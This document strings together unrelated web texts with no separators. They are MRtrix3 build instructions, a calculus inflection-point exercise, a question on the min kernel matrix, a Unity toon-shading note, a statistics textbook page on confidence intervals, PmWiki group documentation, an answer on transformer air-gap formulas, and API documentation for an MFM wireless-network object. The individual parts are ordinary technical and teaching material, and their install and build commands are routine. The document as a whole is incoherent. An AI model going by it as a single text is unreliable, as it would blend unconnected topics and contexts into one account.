# Building MRtrix3 from source¶ The instructions below describe the process of compiling and installing MRtrix3 from source. Please consult the MRtrix3 forum if you encounter any issues. Warning These instructions are for more advanced users who wish to install very specific versions of MRtrix3, or make their own modifications. Most users will find it much easier to install one of the pre-compiled packages available for their platform from the main MRtrix3 website. ## Install Dependencies¶ To install MRtrix3, you will need to have a number of dependencies available on your system, listed below. These can be installed in a number of ways, depending on your specific platform. We provide specific instructions for doing so for GNU/Linux, macOS and Microsoft Windows in the subsequent sections. Required dependencies: • a C++11 compliant compiler (GCC version >= 5, clang); • Python version >= 3.3; • The zlib compression library; • Eigen version >= 3.2 (>= 3.3 recommended); • Qt version >= 5.5 (but not Qt 6) [GUI components only]; and optionally: • libTIFF version >= 4.0 (for TIFF support); • FFTW version >= 3.0 (for improved performance in certain applications, currently only mrdegibbs); • libpng (for PNG support). The instructions below list the most common ways to install these dependencies on Linux, macOS, and Windows platforms. Warning To run the GUI components of MRtrix3 (mrview & shview), you will also need an OpenGL 3.3 compliant graphics card and corresponding software driver. Note that this implies you cannot run the GUI components over a remote X11 connection, since it can’t support OpenGL 3.3+ rendering. The most up-to-date recommendations in this context can be found in the relevant Wiki entry on the MRtrix3 community forum. ### Linux¶ The installation procedure will depend on your system. Package names may changes between distributions, and between different releases of the same distribution. We provide commands to install the required dependencies on some of the most common Linux distributions below. Warning The commands below are suggestions based on what has been reported to work in the past, but may need to be tailored for your specific distribution. See below for hints on how to proceed in this case. • Ubuntu Linux (and derivatives, e.g. Linux Mint): sudo apt-get install git g++ python3 libeigen3-dev zlib1g-dev libqt5opengl5-dev libqt5svg5-dev libgl1-mesa-dev libfftw3-dev libtiff5-dev libpng-dev • RPM-based distros (Fedora, CentOS): sudo yum install git g++ python3 eigen3-devel zlib-devel libqt5-devel libgl1-mesa-dev fftw-devel libtiff-devel libpng-devel On Fedora 24, this is reported to work: sudo yum install git gcc-c++ python3 eigen3-devel zlib-devel qt-devel mesa-libGL-devel fftw-devel libtiff-devel libpng-devel • Arch Linux: sudo pacman -Syu git python gcc zlib eigen qt5-svg fftw libtiff libpng You may find that your package installer is unable to find the packages listed, or that the subsequent steps fail due to missing dependencies (particularly the ./configure command). In this case, you will need to search the package database and find the correct names for these packages: • git; • an appropriate C++ compiler (e.g. GCC 5 or above, or clang); • Python version >= 3.3; • the zlib compression library and its corresponding development header/include files; • the Eigen template library (only consists of development header/include files); • Qt version >= 5.5, its corresponding development header/include files, and the executables required to compile the code. Note that this can be broken up into several packages, depending on how your distribution has chosen to distribute this. You will need to get those that provide these Qt modules: Core, GUI, OpenGL, SVG, and the qmake, rcc & moc executables (note these will probably be included in one of the other packages); • [optional] the TIFF library and utilities version >= 4.0, and its corresponding development header/include files; • [optional] the FFTW library version >= 3.0, and its corresponding development header/include files; • [optional] the PNG library and its corresponding development header/include files. Warning Compilers included in older distributions, e.g. Ubuntu 12.04, may not be capable of compiling MRtrix3, as it requires C++11 support. A solution is to install a newer compiler as provided by an optional addon package repository, e.g. the Ubuntu toolchain PPA. Once the relevant repository has been added to the distribution’s package manager, you’ll need to update the local list of available packages (e.g. sudo apt-get update), followed by explicit installation of the newer version of the compiler (e.g. sudo apt-get install g++-7). Note In many instances where MRtrix3 dependencies are installed in some non-standard fashion, the MRtrix3 configure script will not be able to automatically identify the location and/or appropriate configuration of those dependencies. In such cases, the MRtrix3 configure script provides a range of environment variables that can be set by the user in order to provide this information. Executing configure -help provides a list of such environment variables; in addition, if the script is unable to detect or utilise a particular dependency properly, it will also provide a suggestion of which environment variable may need to be set in a manner tailored for your particular system in order to provide it with the information it needs to locate that dependency. If for whatever reasons you need to install MRtrix3 on a system with older dependencies, and you are unable to update the software (e.g. you want to run MRtrix3 on a centrally-managed HPC cluster), you can as a last resort use the procedures described in this community forum post. ### macOS¶ 1. Update macOS to version 10.10 (Yosemite) or higher (OpenGL 3.3 will typically not work on older versions); 2. Install XCode from the App Store; 3. Install Eigen3 and Qt5. There are several alternative ways to do this, depending on your current system setup. The most convenient is probably to use your favorite package manager (Homebrew or MacPorts), or install one of these if you haven’t already. If you find your first attempt doesn’t work, please resist the temptation to try one of the other options: in our experience, this only leads to further conflicts, which won’t help installing MRtrix3 and will make things more difficult to fix later. Once you pick one of these options, we strongly recommend you stick with it, and consult the community forum if needed for advice and troubleshooting. • With Homebrew: • Install Eigen3: brew install eigen • Install Qt5: brew install qt5 • Install pkg-config: brew install pkg-config • Add Qt’s binaries to your path: export PATH=brew --prefix/opt/qt5/bin:$PATH • With MacPorts: • Install Eigen3: port install eigen3 • Install Qt5: port install qt5 • Install pkg-config: port install pkgconfig • Add Qt’s binaries to your path: export PATH=/opt/local/libexec/qt5/bin:$PATH • As a last resort, you can manually install Eigen3 and Qt5: You can use this procedure if you have good reasons to avoid the other options, or if for some reason you cannot get either Homebrew or MacPorts to work. You need to select the file labelled qt-opensource-mac-x64-clang-5.X.X.dmg. You can choose to install it system-wide or just in your home folder, whichever suits; just remember where you installed it. • Make sure Qt5 tools are in your PATH (edit as appropriate): export PATH=/path/to/Qt5/5.X.X/clang_64/bin:\$PATH • Set the CFLAG variable for Eigen (edit as appropriate): export EIGEN_CFLAGS="-isystem /where/you/extracted/eigen" Make sure not to include the final /Eigen folder in the path name: use the folder in which it resides instead! 4. Install TIFF, FFTW and PNG libraries. • With Homebrew: • Install TIFF: brew install libtiff • Install FFTW: brew install fftw • Install PNG: brew install libpng • With MacPorts: • Install TIFF: port install tiff • Install FFTW: port install fftw-3 • Install PNG: port install libpng ### Windows¶ All of these dependencies are installed below by the MSYS2 package manager. Warning When following the instructions below, use the ‘MinGW-w64 Win64 shell’; ‘MSYS2 shell’ and ‘MinGW-w64 Win32 shell’ must be avoided, as they will yield erroneous behaviour that is difficult to diagnose if used accidentally. Warning At time of writing, this MSYS2 system update will give a number of instructions, including: terminating the terminal when the update is completed, and modifying the shortcuts for executing the shell(s). Although these instructions are not as prominent as they could be, it is vital that they are followed correctly! 1. Download and install the most recent 64-bit MSYS2 installer from http://msys2.github.io/ (msys2-x86_64-*.exe), and following the installation instructions from the MSYS2 wiki. 2. Run the program ‘MinGW-w64 Win64 Shell’ from the start menu. 3. Update the system packages, as per the instructions: pacman -Syuu Close the terminal, start a new ‘MinGW-w64 Win64 Shell’, and repeat as necessary until no further packages are updated. 4. From the ‘MinGW-w64 Win64 Shell’ run: pacman -S git python3 pkg-config mingw-w64-x86_64-gcc mingw-w64-x86_64-eigen3 mingw-w64-x86_64-qt5 mingw-w64-x86_64-fftw mingw-w64-x86_64-libtiff mingw-w64-x86_64-libpng Sometimes pacman may fail to find a particular package from any of the available mirrors. If this occurs, you can download the relevant package from SourceForge: place both the package file and corresponding .sig file into the /var/cache/pacman/pkg directory, and repeat the pacman call above. Sometimes pacman may refuse to install a particular package, claiming e.g.: error: failed to commit transaction (conflicting files) mingw-w64-x86_64-eigen3: /mingw64 exists in filesystem Errors occurred, no packages were upgraded. Firstly, if the offending existing target is something trivial that can be deleted, this is all that should be required. Otherwise, it is possible that MSYS2 may mistake a file existing on the filesystem as a pre-existing directory; a good example is that quoted above, where pacman claims that directory /mingw64 exists, but it is in fact the two files /mingw64.exe and /mingw64.ini that cause the issue. Temporarily renaming these two files, then changing their names back after pacman has completed the installation, should solve the problem. ## Git setup¶ If you intend to contribute to the development of MRtrix3, set up your git environment as per the Git instructions page ## Build MRtrix3¶ 1. Clone the MRtrix3 repository: git clone https://github.com/MRtrix3/mrtrix3.git or if you have set up your SSH keys (for contributors): git clone [email protected]:MRtrix3/mrtrix3.git 2. Configure the MRtrix3 install: cd mrtrix3 ./configure If this does not work, examine the ‘configure.log’ file that is generated by this step, it may give clues as to what went wrong. 3. Build the binaries: ./build ## Set up MRtrix3¶ 1. Update the shell startup file, so that the locations of MRtrix3 commands and scripts will be added to your PATH envionment variable. If you are not familiar or comfortable with modification of shell files, MRtrix3 now provides a convenience script that will perform this setup for you (assuming that you are using bash or equivalent interpreter). From the top level MRtrix3 directory, run the following: ./set_path 2. Close the terminal and start another one to ensure the startup file is read (or just type ‘bash’) 3. Type mrview to check that everything works 4. You may also want to have a look through the List of MRtrix3 configuration file options and set anything you think might be required on your system. Note The above assumes that your shell will read the ~/.bashrc file at startup time. This is not always guaranteed, depending on how your system is configured. If you find that the above doesn’t work (e.g. typing mrview returns a ‘command not found’ error), try changing step 1 to instruct the set_path script to update PATH within a different file, for example ~/.bash_profile or ~/.profile, e.g. as follows: ./set_path ~/.bash_profile ## Keeping MRtrix3 up to date¶ 1. You can update your installation at any time by opening a terminal in the MRtrix3 folder, and typing: git pull ./build 2. If this doesn’t work immediately, it may be that you need to re-run the configure script: ./configure and re-run step 1 again.
# change of concavity Level pending Any graph $$y=f(x)$$ has first derivative given by $$y'=6(x+1)(x-2)^2$$ has point/points of inflection at (1) $$x=0$$ (2). $$x=-1,2$$ (3). $$x=2$$ (4). $$x=0, 2$$ ×
## How to show that the matrix $[\min(x_i,x_j)]$ is positive semi-definite? Well, I want to show that a function is a valid kernel function . The function is, $$k(x,z)=\min(x,z)$$ Thus, I formed a $$N\times N$$ Kernel (Gram) matrix, $$K=[k(x_i,x_j)]$$ for a data set $$x_i$$, $$i=[1:N]$$ How do I show that this matrix is Positive Semi-definite Page 4 of the pdf?
teaching machines Toon shading in Unity We were curious if we could incorporate cel-shading into Unity. Yes, it can be incorporated pretty easily by: 1. Importing the Toon Shading package. 2. Going to all Mesh Renderer components and switching the material to one of the four toon materials that we imported. Applying toon material to terrain took some searching, as the terrain shader isn’t tweakable via the GUI. The simplest solution I found was to open up the toon material, click Edit to adjust the shader code, and change the first line to Shader "Hidden/TerrainEngine/Splatmap/Lightmap-FirstPass" { I don’t know how good of an idea it was to do this, but it worked. The terrain was cel-shaded after I saved the edits. Here’s a short walkthrough: A playable version exists too.
# 7.1 A single population mean using the normal distribution -- rrc  (Page 5/19) Page 5 / 19 ## Try it Refer back to the pizza-delivery Try It exercise. The mean delivery time is 36 minutes and the population standard deviation is six minutes. Assume the sample size is changed to 50 restaurants with the same sample mean. Find a 90% confidence interval estimate for the population mean delivery time. (34.6041, 37.3958) ## Working backwards to find the error bound or sample mean When we calculate a confidence interval, we find the sample mean, calculate the error bound, and use them to calculate the confidence interval. However, sometimes when we read statistical studies, the study may state the confidence interval only. If we know the confidence interval, we can work backwards to find both the error bound and the sample mean. ## Finding the Error Bound • From the upper value for the interval, subtract the sample mean, • OR, from the upper value for the interval, subtract the lower value. Then divide the difference by two. ## Finding the Sample Mean • Subtract the error bound from the upper value of the confidence interval, • OR, average the upper and lower endpoints of the confidence interval. Notice that there are two methods to perform each calculation. You can choose the method that is easier to use with the information you know. Suppose we know that a confidence interval is (67.18, 68.82) and we want to find the error bound. We may know that the sample mean is 68, or perhaps our source only gave the confidence interval and did not tell us the value of the sample mean. ## Calculate the error bound: • If we know that the sample mean is 68: EBM = 68.82 – 68 = 0.82. • If we don't know the sample mean: EBM = $\frac{\left(68.82-67.18\right)}{2}$ = 0.82. ## Calculate the sample mean: • If we know the error bound: $\overline{x}$ = 68.82 – 0.82 = 68 • If we don't know the error bound: $\overline{x}$ = $\frac{\left(67.18+68.82\right)}{2}$ = 68. ## Try it Suppose we know that a confidence interval is (42.12, 47.88). Find the error bound and the sample mean. Sample mean is 45, error bound is 2.88 ## Calculating the sample size n If researchers desire a specific margin of error, then they can use the error bound formula to calculate the required sample size. The error bound formula for a population mean when the population standard deviation is known is EBM = $\left({z}_{\frac{\alpha }{2}}\right)\left(\frac{\sigma }{\sqrt{n}}\right)$ . The formula for sample size is n = $\frac{{z}^{2}{\sigma }^{2}}{EB{M}^{2}}$ , found by solving the error bound formula for n . In this formula, z is ${z}_{\frac{\alpha }{2}}$ , corresponding to the desired confidence level. A researcher planning a study who wants a specified confidence level and error bound can use this formula to calculate the size of the sample needed for the study. The population standard deviation for the age of Foothill College students is 15 years. If we want to be 95% confident that the sample mean age is within two years of the true population mean age of Foothill College students, how many randomly selected Foothill College students must be surveyed? • From the problem, we know that σ = 15 and EBM = 2. • z = z 0.025 = 1.96, because the confidence level is 95%. • n = $\frac{{z}^{2}{\sigma }^{2}}{EB{M}^{2}}$ = $\frac{{\left(1.96\right)}^{2}{\left(15\right)}^{2}}{{2}^{2}}$ = 216.09 using the sample size equation. • Use n = 217: Always round the answer UP to the next higher integer to ensure that the sample size is large enough. Therefore, 217 Foothill College students should be surveyed in order to be 95% confident that we are within two years of the true population mean age of Foothill College students.
authors (basic) Pm Wiki has the capability of classifying pages into groups of related pages. By default page links are between pages of the same group; to create a link to a page in another group, add the name of the other group and a dot or slash to the page name. For example, links to Main.HomePage could be written as: *[[Main.HomePage]] *[[Main/HomePage]] *[[Main(.HomePage)]] *[[Main.HomePage | link text]] ## Creating groups Creating a new group is as easy as creating new pages; simply edit an existing page to include a link to a page in the new group, then click on the '?' to edit the page. By default, group names must start with a letter (but this can be changed by the wiki administrator). For example, to make a page called Bar in the group Foo, create a link to [[Foo/Bar]] and follow the link to edit that page. ## Groups in a standard Pm Wiki distribution • Main : The default group. On many wikis, it contains most of the author-contributed content. Main.Home Page and Main.Wiki Sandbox come pre-installed. • Pm Wiki : An edit-protected group that contains Pm Wiki documentation and help pages. • Site : Holds a variety of utility and configuration pages used by Pm Wiki, including SideBar, Search, Preferences, AllRecentChanges, ApprovedUrls, and Blocklist. To list all the groups in a site, try the markup (:pagelist fmt=group:). ## Special Pages in a Group By default, the Recent Changes page of each group shows only the pages that have changed within that group; the Site.AllRecentChanges page shows all pages that have changed in all groups. Each group can also have GroupHeader or GroupFooter pages that contain text to be automatically prepended or appended to every page in the group. A group can also have a GroupAttributes page that defines attributes (read and edit passwords) shared by all pages within the group. No, Pm Wiki does not have subpages. Pm's reasons for not having subgroups are described at PmWiki:HierarchicalGroups, but it comes down to not having a good page linking syntax. If you create a link or pagename like [[A.B.C]] Pm Wiki doesn't think of "B.C" as being in group "A", it instead thinks of "C" as being in group "AB", which is a separate group from "A". Wiki administrators can look at Cookbook:SubpageMarkup and Cookbook:IncludeWithEdit for recipes that may be of some help with developing subgroups or subpages.
# Electronic – How to correctly use the formula for calculating the air-gap in a pulse transformer resonant-convertertransformer To achieve a certain value of the magnetizing inductance (Lm), we can adjust the transformer air gap. Air gap calculation formula: There is no particular information on this, but I assumed that: u0 = Vacuum permeability (4π×10−7 H/m) N - primary turns? (x18) Ae effective area (PQ5050) = 328mm2 (Core datasheet) Lm = magnetic inductance (my goal - 60uH) Substituting these values ​​into the formula, I got 2.2 meters of the gap, which is clearly incorrect. (0.000001257 * 324(18^2) * 0.328) / 0.00006 Next, I tried replacing N with the transformation ratio (n = 1.5), I got 15.46mm of the gap. This is closer to true, but still a very large gap. (0.000001257 * 2.25(1.5^2) * 0.328) / 0.00006 I also tried to remove the square from N, but this is still a very large gap. Question: what is my mistake? I assumed that the matter is in N (it is not clear whether this is the number of turns of the primary winding, or this is the transformation ratio (but it is denoted by a small n)) Perhaps there are other formulas with which you can get the Air gap value, the desired value of the magnetizing inductance? Perhaps there are other formulas with which you can get the Air gap value, the desired value of the magnetizing inductance? Well, you have the ferrite core-set data sheet and you have the ferrite material spec; 3C95 so let's proceed from there. The important formulas to know are these: - The effective permeability of a core set when gapped $$\mu_e = \dfrac{\mu_i}{\mu_i\cdot\dfrac{\ell_g}{\ell_e}+1}$$ • Where $$\\mu_i\$$ is the ungapped magnetic relative permeability of 3C95 (2530) • Where $$\\mu_e\$$ is the gapped magnetic relative permeability of 3C95 (trying to find this) • Where $$\\ell_g\$$ is the length of the gap in metres (maybe 1mm or 0.001 metres) • Where $$\\ell_e\$$ is the core magnetic length in metres (0.113 metres) If you plug-in the numbers with a gap of 1 mm, $$\\mu_e\$$ equals 108.17 and this is used in the next formula for inductance: - Inductance of the gapped core set $$L = \dfrac{\mu_0\cdot\mu_e \cdot N^2 \cdot A_e}{\ell_e + \ell_g}$$ • Where $$\A_e\$$ is the effective cross sectional area in m² (328 mm² or 3.28 x $$\10^{-4}\$$ m²) • Where $$\N\$$ is the number of turns (18) • Where $$\\mu_0\$$ is $$\4\pi\times 10^{-7}\$$ • The formula assumes that gapping has increased the magnetic length of the core - should you in fact "grind" down the centre limb, the total effective length remains as $$\\ell_e\$$. So, if you plug in the numbers now (1 mm gap) you get 126.7 μH Given the above, I reckon you should be able to figure out the reverse process to get the inductance you require (about 2 mm). Summary You will also have to double check that you have provided enough of a gap so that the peak magnetic flux density remains significantly less than 400 mT. I usually aim for 200 mT but, in the Cree document that you linked, they appear to be aiming for 120 mT. This is fairly easy to check remembering that $$\B = \mu_0\cdot \mu_e\cdot H\$$ where $$\H\$$ is the peak current multiplied by number of turns and then divided by $$\\ell_e\$$. Or, $$\H = \dfrac{MMF}{\ell_e}\$$
An MFM network, as its name suggests, is used to house multiple devices the links connecting them. MFM networks are represented by the network_mfm object. The network_mfm object simplifies adding devices to the network and provides multiple ways to establish links between the devices. While a network can be used in various fashions, the most straightforwad is to populate it with source devices and destination devices. Source devices are device objects with transmit capability that will be transmitting to a destination device object having receive capability. When multiple source devices are present in the same network, interference manfifests via links connecting source devices to devices other than its intended destination. For example, there are four devices in the network shown in the figure above. The source device device-1 aims to transmit to the destination device device-2. The source device device-3 aims to transmit to the destination device device-4. Four link objects are produced: 1. two desired links shown in solid black—between device-1 and device-2 and frbetweenom device-3 and device-4 2. two interference links shown in dashed red—between device-1 and device-4 and between device-3 and device-2 Using knowledge of these sources, destinations, and links, the network handles high-level operations like acquiring and distributing channel state information (CSI) and reporting performance metrics like mutual information/spectral efficiency and received symbol error. ### Creating a Network To create a network in MFM, use n = network_mfm.create() where n is an empty network_mfm object. ### Key Properties A network_mfm object n contains a few important properties. First, as mentioned, each network contains source-destination pairs—pairs of device objects—that indicate which devices (sources) are transmitting to which devices (destinations). The sources are stored in n.sources where n.sources is a cell of device objects having transmit capability. The number of sources in the network is n.num_sources Similarly, destination devices are stored in n.destinations which is a cell of device objects having receive capability. The number of destinations in the network—which should equal the number of sources—is stored in n.num_destinations The links in the network are stored in n.links which is a cell of link objects. The number of links in the network is stored in n.num_links All (unique) devices in the network are stored in n.devices which is a cell of device objects. In most cases, devices should be added to a network n using n.add_source_destination(source,destination) where source and destination are device objects. Note that pairs of devices are added to the network, not individual devices. This will automatically populate the properties n.sources and n.destinations with the newly added devices. This will also automatically include the source and destination devices in the property n.devices if they are not already present. ### Removing a Source-Destination Pair To remove a source-destination pair from a network n, simply use n.remove_source_destination_pair(source,destination) where source and destination are device objects to remove. Note that pairs of devices are removed from the network, not individual devices. To remove all source-destination pairs from a network n, use n.remove_all_source_destination() Recall that sources are transmitting devices and destinations are receiving devices. The easiest and most practical way to establish links between devices in a network n is to use n.populate_links_from_source_destination() which will automatically establish links between all sources and destinations. In other words, for a given source, a link will be created between it and each destination in the network. With $N$ source-destination pairs, populating links between all sources and destinations will yield $N^2$ links. While a physical link may exist between one source device and another source device, it does not hold much practical value since neither is necessarily receiving. Likewise, a physical link may exist between one destination device and another destination device, but it does not hold much practical value since neither is necessarily transmitting. Nonetheless, MFM supplies functions to manually create links via n.add_link(lnk) where lnk is a link object or via n.add_links(lnks) where lnks is a vector of link objects. ### Viewing the Network To view a network n in 3-D use, n.show_3d() which will display a figure similar to ### Passthrough Methods Configuring each link and each device in a network can be quite cumbersome, especially as the network grows. To make configuring objects network-wide more straightforward, we have provided the following passthrough methods for network_mfm objects. Links within a network n can be configured one-by-one if desired by accessing the i-th link directly via n.links{i}. It is often the case that the same channel model and path loss model will be used across all links in a network. In light of this, MFM supplies the functions n.set_channel(c) n.set_path_loss(p) where c is a channel object and p is a path_loss object. This will set each link object in the network to use the same channel model and path loss model, each with their own unique realizations. #### Carrier Frequency, Propagation Velocity, and Symbol Bandwidth To set the carrier frequency, propagation velocity, and symbol bandwidth at all devices and links within a network n, use n.set_carrier_frequency(fc); n.set_propagation_velocity(vel); n.set_symbol_bandwidth(B); where fc is the carrier frequency (in Hz), vel is the propagation velocity (in m/s), and B is the symbol bandwidth (in Hz). #### Transmit Power To set the transmit power at all devices to a value of P, use n.set_transmit_power(P,unit) where unit is a string specifying the units of P (e.g., 'dBm', 'watts'). #### Noise Power To set the noise power at all devices to a value of noise_psd, use n.set_noise_power_per_Hz(noise_psd,unit) where unit is a string specifying the units of noise_psd (e.g., 'dBm_Hz', 'watts_Hz'). #### Number of Streams To set the number of streams at all devices to a value of Ns, use n.set_num_streams(Ns) #### Transmit Symbol T set the transmit symbol at all devices to a vector s, use n.set_transmit_symbol(s) Note that this is only appropriate if all devices are transmitting with the same number of streams. ### Invoking a Network Realization To invoke a realization of the channels on all links in a network n, use n.realization_channel() To invoke a realization of the path loss on all links in a network n, use n.realization_path_loss() To invoke a realization of all channels and path losses in one line, simply use n.realization() ### Channel State Information To compute the channel state information for a realization of a network n, use n.compute_channel_state_information() To supply each device with this computed channel state information, use n.supply_channel_state_information() ### Configuring Devices to Transmit and Receive To configure all transmitters in the network to use a particular transmit strategy, use n.configure_transmitter(strategy) where strategy is a string specifying which strategy the transmitters should use. This string must be one of the valid transmit strategies that have been defined for the transmitter objects being used in the network. Please refer to documentation on the transmitter object for more information on this. To configure all receivers in the network to use a particular receive strategy, use n.configure_receiver(strategy) where strategy is a string specifying which strategy the receivers should use. This string must be one of the valid receive strategies that have been defined for the receiver objects being used in the network. Please refer to documentation on the receiver object for more information on this. ### Received Signals at Each Device With a realized network and configured transmitters and receivers, the received signals at each device can be computed via n.compute_received_signals() ### Performance Metrics To evaluate the performance of a network, MFM can compute and report the mutual information and estimation error of the receive symbol versus the transmit symbol for each source-destination pair. #### Mutual Information To report the achieved Gaussian mutual information (spectral efficiency) between a source device and destination device, use mi = n.report_mutual_information(source,destination) where source is a source device, destination is a destination device, and mi is the mutual information in bps/Hz. #### Symbol Estimation Error To report the achieved estimation error between the transmit symbol $\mathbf{s}$ at a source device and the receie symbol $\hat{\mathbf{s}}$ destination device, use [err,nerr] = n.report_symbol_estimation_error(source,destination) where source is a source device, destination is a destination device, err is the symbol estimation error defined as and nerr is the symbol estimation error normalized to the transmit symbol energy defined as ### List of Properties The network_mfm object contains the following properties: • network_mfm.name • network_mfm.devices • network_mfm.num_devices • network_mfm.links • network_mfm.num_links • network_mfm.sources • network_mfm.num_sources • network_mfm.destinations • network_mfm.num_destinations • network_mfm.propagation_velocity • network_mfm.carrier_frequency • network_mfm.carrier_wavelength • network_mfm.symbol_bandwidth • network_mfm.channel_state_information_transmit • network_mfm.channel_state_information_receive ### List of Methods The network_mfm object contains the following methods: #### add_destination(destination) Adds a destination device to the network. Usage: add_destination(destination) Input Arguments: destination — a device object Back to methods #### add_device(device) Adds a device to the network. Usage: add_device(device) Input Arguments: device — a device object Back to methods #### add_devices(devices) Adds a vector of devices to the network. Usage: add_devices(devices) Input Arguments: devices — a vector (or cell) of device objects Back to methods Usage: add_link(lnk) Input Arguments: lnk — a link object Back to methods Usage: add_links(links) Input Arguments: links — a vector of link objects Back to methods #### add_source(source) Adds a source device to the network. Usage: add_source(source) Input Arguments: source — a device object Back to methods #### add_source_destination(source,destination) Adds a source-destination pair to the network. Usage: add_source_destination(source,destination) Input Arguments: source — a device object to be the source destination — a device object to be the destination Back to methods #### compute_channel_state_information() Computes the channel state information for each device in the network. For each device, the CSI is collected across all links in which the device is the transmitter (head on the forward link, tail on the reverse link) or receiver (tail on the forward link, head on the reverse link). Usage: compute_channel_state_information() Back to methods #### compute_channel_state_information_receive(dev) Computes the receive channel state information for a device. Specifically, it collects the CSI across all links (forward and reverse) in which the device could be a receiver. This reduces to collecting CSI across forward links where the device is the tail and across reverse links where the device is the head. Usage: csi = compute_channel_state_information_receive(dev) Input Arguments: dev — a device object Return Values: csi — a struct of channel state information values Back to methods #### compute_channel_state_information_transmit(dev) Computes the transmit channel state information for a device. Specifically, it collects the CSI across all links (forward and reverse) in which the device could be a transmitter. This reduces to collecting CSI across forward links where the device is the head and across reverse links where the device is the tail. Usage: csi = compute_channel_state_information_transmit(dev) Input Arguments: dev — a device object Return Values: csi — a struct of channel state information values Back to methods #### compute_covariance_desired(source,destination) Computes the covariance of the received symbols at a destination device from its source. Also returns the covariance of received noise. Usage: [Ry,Rn] = compute_covariance_desired(source,destination) Input Arguments: source — a source device destination — a destination device Return Values: Ry — the desired signal covariance Rn — the noise covariance Back to methods #### compute_covariance_interference(source,destination) Computes the covariance of received interference at a destination device (i.e., the contribution of all interference links). Usage: R = compute_covariance_interference(source,destination) Input Arguments: source — a source device destination — a destination device Return Values: R — the covariance matrix of interference Notes: Assumes independence across interferers. Back to methods #### compute_received_signal(destination) Computes the signal impinging the receive array at a destination device. This is comprised of all desired and interfering transmitters as well as additive noise. Usage: y = compute_received_signal(destination) Input Arguments: destination — a device object Return Values: y — the vector impinging the receive array at the destination Back to methods #### compute_received_signals() Computes the received signal at each destination device in the network. Usage: compute_received_signals() Back to methods #### configure_receiver(strategy) Configures each destination in the network according to their existing/specified receive strategy. Usage: configure_receiver() configure_receiver(strategy) Input Arguments: strategy — (optional) a string specifying the receive strategy to use, overwriting existing ones Back to methods #### configure_transmitter(strategy) Configures each source in the network according to their existing/specified transmit strategy. Usage: configure_transmitter() configure_transmitter(strategy) Input Arguments: strategy — (optional) a string specifying the transmit strategy to use, overwriting existing ones Back to methods #### create() Creates a network object. Usage: obj = network_mfm.create() Return Values: obj — an MFM network object Back to methods #### get_device_index(dev) Returns the index of a device within the devices in the network. Usage: idx = get_device_index(dev) Input Arguments: dev — a device object or index of a device Return Values: idx — the index of the device Back to methods Returns the index of a link within the links in the network. Usage: idx = get_link_index(lnk) Input Arguments: lnk — a link object or index of a link Return Values: idx — the index of the link Back to methods Returns the indeces of the links in the network that contain a destination device. Also returns whether each of those links is forward or reverse. Usage: [idx,fwd_rev] = get_link_index_destination(destination) Input Arguments: destination — a destination device Return Values: idx — a vector of indeces of links in the network fwd_rev — a vector of booleans indicating if the forward or reverse link contains the destination device as the receiving side (0 for forward, 1 for reverse) Back to methods Returns the index of the link with a specific source-destination pair and an indicator for if that link is a forward or reverse link. Usage: [idx,fwd_rev] = get_link_index_source_destination(source,destination) Input Arguments: source — a device object destination — a device object Return Values: idx — the index of the link whose head and tail are the source and destination (or vice versa); returns 0 if not found fwd_rev — a boolean indicating if the head or tail of the link is the source (0 if head = source, forward; 1 if tail = source, reverse) Back to methods Returns the index of the link whose head and tail are specific source and destination devices, respectively (i.e., which link has head = source and tail = destination). Usage: idx = get_link_index_source_destination_forward(source,destination) Input Arguments: source — a device object destination — a device object Return Values: idx — the index of the link whose head and tail are the source and destination, respectively; returns 0 if not found Back to methods Returns the index of the link whose tail and head are specific source and destination devices, respectively (i.e., which link has head = destination and tail = source). Usage: idx = get_link_index_source_destination_reverse(source,destination) Input Arguments: source — a device object destination — a device object Return Values: idx — the index of the link whose tail and head are the source and destination, respectively; returns 0 if not found Back to methods #### initialize() Executes intialization steps to set up a network. Usage: initialize() Back to methods #### network_mfm(name) Creates a network object. Usage: obj = NETWORK() obj = NETWORK(name) Input Arguments: name — an optional name for the network Return Values: obj — an object representing a network Back to methods Populates the devices in the network from the links in the network. Usage: populate_devices_from_links() Back to methods Populates the links in the network from the devices in the network by linking each pair of devices. Usage: populate_links_from_devices() Back to methods Populates the links in the network from the sources and destinations in the network by linking each pair of devices. Removes all links before populating links. Usage: populate_links_from_source_destination() Back to methods #### realization() Invokes a realization of the network, including all of the links it contains. Usage: realization() Back to methods #### remove_all_devices() Removes all devices from the network. Usage: remove_all_devices() Back to methods Removes all links from the network. Usage: remove_all_links() Back to methods Removes all links having a particular device as its head or tail. Usage: remove_all_links_with_device(dev) Input Arguments: dev — a device object Back to methods #### remove_all_source_destination() Removes all source-destination pairs from the network. Usage: remove_all_source_destination() Back to methods #### remove_all_source_destination_with_device(dev) Removes all source-destination pairs having a particular device as the source or destination. Usage: remove_all_source_destination_with_device(dev) Input Arguments: dev — a device object Back to methods #### remove_device(idx) Removes a device from the network. Usage: remove_device() remove_device(idx) Input Arguments: idx — optional device index to remove from the network (default is the last device in the network) Back to methods Removes a link from the network. Usage: remove_link() remove_link(lnk) Input Arguments: lnk — (optional) link index or object to remove from the network; if not passed, the last link in the network is removed Back to methods #### remove_source_destination(source,destination) Removes a source-destination pair from the network. Usage: remove_source_destination(source,destination) Input Arguments: source — a device object destination — a device object Back to methods #### report_mutual_information(source,destination) Reports the Gaussian mutual information achieved between a source-destination pair based on the current network realization and transmit-receive configurations. Returns the mutual information in bps/Hz. Discards any residual imaginary component. Usage: mi = report_mutual_information(source,destination) Input Arguments: source — a source device destination — a destination device Return Values: mi — the mutual information in bps/Hz Notes: Will warn the user if a significant imaginary portion exists when computing the mutual information. Ultimately discards it though. Back to methods #### report_symbol_estimation_error() Returns the squared-error in the estimated receive symbol at the destination compared to the transmit symbol at the source. Usage: [err,nerr] = report_symbol_estimation_error(source,destination) Return Values: err — the squared error of the received symbols versus the transmitted symbols nerr — err normalized to the transmit symbol power Back to methods #### set_arrays(transmit_array,receive_array) Usage: set_arrays(transmit_array,receive_array) Input Arguments: transmit_array — array object receive_array — array object Back to methods #### set_carrier_frequency(fc) Sets the carrier frequency on each link. Usage: set_carrier_frequency(fc) Input Arguments: fc — carrier frequency in Hertz Notes: Back to methods #### set_channel(channel_object) Sets the channel model used on each link. Usage: SET_channel(channel_object) Input Arguments: channel_object — a channel object Back to methods #### set_name(name) Sets the name of the network. Usage: set_name() set_name(name) Input Arguments: name — (optional) a string; if not passed, a name is created Back to methods #### set_noise_power_per_Hz(noise_psd,unit) Sets the noise power spectral density on each link. Usage: set_noise_power_per_Hz(noise_psd) set_noise_power_per_Hz(noise_psd,unit) Input Arguments: noise_psd — noise power spectral density unit — (optional) a string specifying the unit of noise_psd; if not passed, the default will be used Back to methods 